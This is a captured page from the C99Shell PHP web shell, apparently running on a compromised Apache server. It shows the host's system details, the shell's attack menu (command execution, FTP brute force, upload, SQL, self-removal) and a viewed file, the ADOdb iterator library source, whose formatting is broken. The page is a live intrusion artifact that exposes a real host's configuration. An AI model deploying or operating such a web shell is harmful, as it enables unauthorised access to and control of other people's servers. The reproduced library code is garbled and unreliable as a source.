!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/doku/axrepos/ax/pgadmin/libraries/adodb/   drwxr-xr-x
Free 11.54 GB of 97.11 GB (11.88%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     adodb-iterator.inc.php (1.56 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
  V4.94 23 Jan 2007  (c) 2000-2007 John Lim (jlim#natsoft.com.my). All rights reserved.
  Released under both BSD license and Lesser GPL library license. 
  Whenever there is any discrepancy between the two licenses, 
  the BSD license will take precedence.
  
  Set tabs to 4.
  
  Declares the ADODB Base Class for PHP5 "ADODB_BASE_RS", and supports iteration with 
  the ADODB_Iterator class.
  
          $rs = $db->Execute("select * from adoxyz");
        foreach($rs as $k => $v) {
            echo $k; print_r($v); echo "<br>";
        }
        
        
    Iterator code based on http://cvs.php.net/cvs.php/php-src/ext/spl/examples/cachingiterator.inc?login=2
 */
 

 
class ADODB_Iterator implements Iterator {

    private 
$rs;

    function 
__construct($rs
    {
        
$this->rs $rs;
    }
    function 
rewind() 
    {
        
$this->rs->MoveFirst();
    }

    function 
valid() 
    {
        return !
$this->rs->EOF;
    }
    
    function 
key() 
    {
        return 
$this->rs->_currentRow;
    }
    
    function 
current() 
    {
        return 
$this->rs->fields;
    }
    
    function 
next() 
    {
        
$this->rs->MoveNext();
    }
    
    function 
__call($func$params)
    {
        return 
call_user_func_array(array($this->rs$func), $params);
    }

    
    function 
hasMore()
    {
        return !
$this->rs->EOF;
    }

}


class 
ADODB_BASE_RS implements IteratorAggregate {
    function 
getIterator() {
        return new 
ADODB_Iterator($this);
    }
    
    
/* this is experimental - i don't really know what to return... */
    
function __toString()
    {
        include_once(
ADODB_DIR.'/toexport.inc.php');
        return 
_adodb_export($this,',',',',false,true);
    }



?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0058 ]--